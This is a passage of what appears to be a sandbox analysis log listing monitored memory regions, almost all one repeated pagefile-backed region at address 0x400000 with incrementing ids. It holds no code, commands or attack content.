0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9288 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9291 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9292 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9293 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9295 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9296 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9299 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9300 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9301 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9302 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9303 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9305 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9306 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9307 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9310 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9311 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9314 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9315 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9316 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9317 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9318 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9319 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9320 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9322 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9323 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9324 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9325 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9328 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9329 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9332 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9333 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9336 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9337 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9340 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9341 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9342 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9345 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9346 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9347 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9349 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9350 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9353 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9354 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9357 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9358 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9361 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9362 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9364 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9365 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9366 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9369 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9370 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9371 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9374 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9375 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9376 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9379 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9380 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9383 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9384 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9387 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9388 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9389 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9390 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9391 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9393 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9394 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9395 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9398 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9399 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9400 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9403 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9404 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9405 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9407 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9408 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9409 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9411 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9412 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9413 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9415 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9417 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9418 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9419 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9421 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9422 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9423 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9425 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9426 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9427 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9428 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9429 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9430 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9431 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9432 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9433 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9434 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9435 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9436 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9437 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9438 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9439 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9440 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9441 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9443 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9444 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9445 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9447 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9448 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9449 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9451 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9452 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9453 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9455 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9456 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9457 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9459 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9460 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9461 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9463 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9464 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9465 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9466 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9467 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9468 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9469 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9470 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9471 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9472 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9473 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9474 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9475 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9476 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9477 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9478 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9479 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 